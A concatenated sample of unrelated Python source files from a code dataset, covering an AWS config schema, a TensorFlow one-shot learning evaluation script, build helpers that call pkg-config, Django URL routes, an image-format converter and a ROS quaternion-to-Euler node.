    """Schema for the ``network`` section; only the security group is required."""
    security_group_id = fields.String(required=True)
    subnet_id = fields.String()  # optional
    class Meta:
        # Keep serialized field order identical to declaration order.
        ordered = True
class ComputeAwsSchema(Schema):
    """Top-level schema for an AWS compute configuration.

    Nests the instance/auth/network schemas above plus an optional list of
    provision actions (see ``.provision.ProvisionActionSchema``).
    """
    provider = fields.String(required=True)
    instance = fields.Nested(InstanceSchema, required=True)
    auth = fields.Nested(AuthSchema, required=True)
    network = fields.Nested(NetworkSchema, required=True)
    provision_actions = fields.Nested(ProvisionActionSchema, many=True)
    class Meta:
        # Keep serialized field order identical to declaration order.
        ordered = True
| StarcoderdataPython |
3372671 | """Test unimodal vision and speech models on Flickr one-shot multimodal task.
Author: <NAME>
Contact: <EMAIL>
Date: October 2019
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import os
from absl import app
from absl import flags
from absl import logging
import numpy as np
import tensorflow as tf
from moonshot.baselines import dataset
from moonshot.baselines import experiment
from moonshot.experiments.flickr_multimodal import flickr_multimodal
from moonshot.utils import file_io
from moonshot.utils import logging as logging_utils
FLAGS = flags.FLAGS

# one-shot evaluation options
flags.DEFINE_integer("episodes", 400, "number of L-way K-shot learning episodes")
flags.DEFINE_integer("L", 10, "number of classes to sample in a task episode (L-way)")
flags.DEFINE_integer("K", 1, "number of task learning samples per class (K-shot)")
flags.DEFINE_integer("N", 15, "number of task evaluation samples")
flags.DEFINE_integer("k_neighbours", 1, "number of nearest neighbours to consider")
flags.DEFINE_string("metric", "cosine", "distance metric to use for nearest neighbours matching")
flags.DEFINE_enum("speaker_mode", "baseline", ["baseline", "difficult", "distractor"],
                  "type of speakers selected in a task episode")
flags.DEFINE_bool("unseen_match_set", False, "match set contains classes unseen in K-shot learning")
flags.DEFINE_integer("seed", 42, "that magic number")

# base model directories (speech and vision embedding networks)
flags.DEFINE_string("vision_base_dir", None, "directory containing base vision network model")
flags.DEFINE_string("audio_base_dir", None, "directory containing base audio network model")

# logging options
# Bug fix: the two adjacent string literals previously joined as
# "...stored(defaults..." with no separating space in the --help text.
flags.DEFINE_string("output_dir", None, "directory where logs will be stored "
                    "(defaults to logs/<unique run id>)")
flags.DEFINE_bool("debug", False, "log with debug verbosity level")
def data_preprocess_func(embed_paths):
  """Load a batch of serialized embeddings and stack them into one array.

  Reads zlib-compressed TFRecord files at *embed_paths*, extracts the
  "embed" tensor from each protobuf, and returns the stacked result.
  """
  def extract_embedding(example):
    return dataset.parse_embedding_protobuf(example)["embed"]

  records = tf.data.TFRecordDataset(embed_paths, compression_type="ZLIB")
  # map sequential to prevent optimization overhead
  embeddings = records.map(extract_embedding, num_parallel_calls=8)
  return np.stack(list(embeddings))
def test():
  """Test extracted image and speech model embeddings for one-shot learning."""
  # Embeddings were exported from the (linear) dense layer of each base model.
  audio_embed_dir = os.path.join(FLAGS.audio_base_dir, "embed", "dense")
  vision_embed_dir = os.path.join(FLAGS.vision_base_dir, "embed", "dense")

  # Build the Flickr multimodal one-shot experiment over those embeddings.
  one_shot_exp = flickr_multimodal.FlickrMultimodal(
      features="mfcc", keywords_split="one_shot_evaluation",
      flickr8k_image_dir=os.path.join("data", "external", "flickr8k_images"),
      speech_embed_dir=audio_embed_dir, image_embed_dir=vision_embed_dir,
      speech_preprocess_func=data_preprocess_func,
      image_preprocess_func=data_preprocess_func,
      speaker_mode=FLAGS.speaker_mode,
      unseen_match_set=FLAGS.unseen_match_set)

  # Evaluate nearest-neighbour matching on L-way K-shot episodes.
  task_accuracy, _, conf_interval_95 = experiment.test_multimodal_l_way_k_shot(
      one_shot_exp, FLAGS.K, FLAGS.L, n=FLAGS.N, num_episodes=FLAGS.episodes,
      k_neighbours=FLAGS.k_neighbours, metric=FLAGS.metric)

  logging.log(
      logging.INFO,
      f"{FLAGS.L}-way {FLAGS.K}-shot accuracy after {FLAGS.episodes} "
      f"episodes: {task_accuracy:.3%} +- {conf_interval_95*100:.4f}")
def main(argv):
  """Script entry point: configure environment and logging, then run test()."""
  del argv  # unused

  logging.log(logging.INFO, "Logging application {}".format(__file__))
  if FLAGS.debug:
    logging.set_verbosity(logging.DEBUG)
    logging.log(logging.DEBUG, "Running in debug mode")

  # Let GPU memory grow on demand instead of grabbing it all up front.
  gpus = tf.config.experimental.list_physical_devices("GPU")
  tf.config.experimental.set_memory_growth(gpus[0], True)

  # Default the output directory to a unique, timestamped run directory.
  if FLAGS.output_dir is not None:
    output_dir = FLAGS.output_dir
  else:
    run_stamp = datetime.datetime.now().strftime("%Y%m%d-%H%M%S")
    output_dir = os.path.join("logs", __file__, run_stamp)
    file_io.check_create_dir(output_dir)

  # Collect this module's flag values so they appear in the run log.
  flag_options = {
      flag.name: flag.value
      for flag in FLAGS.get_key_flags_for_module(__file__)}

  logging_utils.absl_file_logger(output_dir, f"log.test")
  logging.log(logging.INFO, f"Model directory: {output_dir}")
  logging.log(logging.INFO, f"Flag options: {flag_options}")

  # Seed NumPy and TensorFlow for reproducibility.
  np.random.seed(FLAGS.seed)
  tf.random.set_seed(FLAGS.seed)

  # Evaluate the baseline matching model (no background training step).
  test()


if __name__ == "__main__":
  app.run(main)
| StarcoderdataPython |
91692 | #!/usr/bin/python3
import subprocess, os
import re
def get_output(cmd):
    """Run *cmd* and return its stdout split on whitespace, as a list of str.

    Empty tokens are dropped; stderr is captured and discarded.
    """
    my_env = os.environ.copy()
    # NOTE(review): `variant` is a module-level name defined elsewhere in this
    # project; calling this raises NameError if it is unset -- confirm.
    if variant == 'windows':
        my_env['PKG_CONFIG_PATH'] = '/tmp/gtk_download_test/lib/pkgconfig'
    p = subprocess.Popen(cmd, env=my_env, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    out, err = p.communicate()
    # Bug fix: b'\s+' contains an invalid escape in a plain bytes literal
    # (SyntaxWarning on modern Python); use a raw bytes pattern instead.
    tokens = re.split(rb'\s+', out)
    return [tok.decode('utf8') for tok in tokens if tok]
@GenRuleFunc
def pkg_config(name):
    """Build a GenRule whose link and compile flags come from pkg-config."""
    gen = GenRule(name)
    link_flags = get_output(['pkg-config', name, '--libs'])
    gen.meta.cc_system_so_flags.add_all(link_flags)
    compile_flags = get_output(['pkg-config', name, '--cflags'])
    gen.meta.dep_cc_flags.add_all(compile_flags)
    return gen
@GenRuleFunc
def cc_lflags(name, lflags=None):
    """Create a GenRule that only contributes raw linker flags.

    Bug fix: the previous mutable default argument ``lflags=[]`` was shared
    across calls; ``None`` now stands in for "no flags".
    """
    rule = GenRule(name)
    rule.meta.cc_system_so_flags.add_all(lflags if lflags is not None else [])
    return rule
@GenRuleFunc
def cc_a_library(name, libname, cflags=None):
    """Create a GenRule for a static (.a) library dependency.

    ``libname`` is recorded as both input and output static lib; ``cflags``
    are propagated to dependents. Bug fix: the previous mutable default
    argument ``cflags=[]`` was shared across calls; ``None`` now stands in
    for "no flags".
    """
    rule = GenRule(name)
    rule.inp.cc_a_lib.add(libname)
    rule.out.cc_a_lib.depends_on(rule.inp.cc_a_lib)
    rule.meta.dep_cc_flags.add_all(cflags if cflags is not None else [])
    return rule
| StarcoderdataPython |
128184 | from .exceptions import BaseSnappyError, CorruptError, TooLargeError # noqa: F401
from .main import compress, decompress # noqa: F401
| StarcoderdataPython |
1793256 | <reponame>Devil-619/pymovies-project<gh_stars>0
from django.urls import path
from .views import MovieListView, GenreMovieListView, MovieSearchResult, WatchListView, RecommendListView
from . import views
# URL routes for the movies app; handlers live in ``.views``. Route names
# identify each pattern for URL reversing.
urlpatterns = [
    path('', MovieListView.as_view(), name='movie-home'),
    path('genre/<str:genre>/', GenreMovieListView.as_view(), name='movie-genre'),
    path('movie/<str:title>/', views.MovieDetail, name='movie-detail'),
    path('watchlist/<str:username>/', WatchListView.as_view(), name='user-watchlist'),
    path('recommendations/<str:username>/', RecommendListView.as_view(), name='user-recommend'),
    path('search/', views.MovieSearch, name='movie-search'),
    path('search-results/<str:title>/', MovieSearchResult.as_view(), name='movie-search-result'),
    path('about/', views.about, name='movie-about'),
]
| StarcoderdataPython |
23770 | #!/usr/bin/env python
# Convert every .jpg in the current directory to .png, then delete the .jpg
# sources in a separate, hard-coded training directory.
# Bug fixes: the original imported `from glob import glob` and later
# re-imported `import glob`, shadowing the function with the module; it also
# passed cv2.imread's None result (unreadable file) straight to imwrite.
import glob
import os

import cv2

# convert jpg to png
for jpg_path in glob.glob('./*.jpg'):
    img = cv2.imread(jpg_path)
    if img is None:
        # Unreadable/corrupt image -- skip instead of crashing in imwrite.
        continue
    cv2.imwrite(os.path.splitext(jpg_path)[0] + '.png', img)

# delete jpg files
dir = "/Users/wangmeijie/ALLImportantProjects/FlameDetectionAPP/Models/MaskRCNN/02_26_2020/Mask_RCNN/dataset/train"
for jpgpath in glob.iglob(os.path.join(dir, '*.jpg')):
    os.remove(jpgpath)
3227842 | <reponame>SaidAlvarado/Cygnus_Quadcopter
#!/usr/bin/env python
# Script that listen to a Geometry Pose Message, transforms it into a Euler rotation, ans publishes it as a
# Vector3 message. with x = ROLL, y = PITCH and z = YaW.
# Reference = http://answers.ros.org/question/69754/quaternion-transformations-in-python/
import rospy
import tf
import math
# Import the float array message
from geometry_msgs.msg import Pose
from geometry_msgs.msg import Vector3
# Function callback used when a quaternion is received
def callback(data):
global pub
if not rospy.is_shutdown():
rospy.loginfo(data)
# Use TF to convert the quaternion to euler, the publish it
euler_msg = Vector3();
quaternion = (
data.orientation.x,
data.orientation.y,
data.orientation.z,
data.orientation.w)
euler = tf.transformations.euler_from_quaternion(quaternion)
euler_msg.x = euler[0]*180/math.pi
euler_msg.y = euler[1]*180/math.pi
euler_msg.z = euler[2]*180/math.pi
# publish the euler vetor as ROLL, PITH, YAW.
pub.publish(euler_msg)
if __name__ == "__main__":
    try:
        # Publisher for the converted Euler angles read by callback().
        pub = rospy.Publisher('teensy_euler', Vector3, queue_size=10)
        rospy.init_node("quaternion2euler", anonymous = True)
        # Convert every incoming quadcopter pose via callback().
        rospy.Subscriber("quadcopter_pose", Pose, callback)
        rospy.spin()
    except rospy.ROSInterruptException:
        pass
class NotSupportedException(Exception):
    """Raised when a requested operation or feature is not supported."""

    def __init__(self, message):
        super(NotSupportedException, self).__init__(message)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.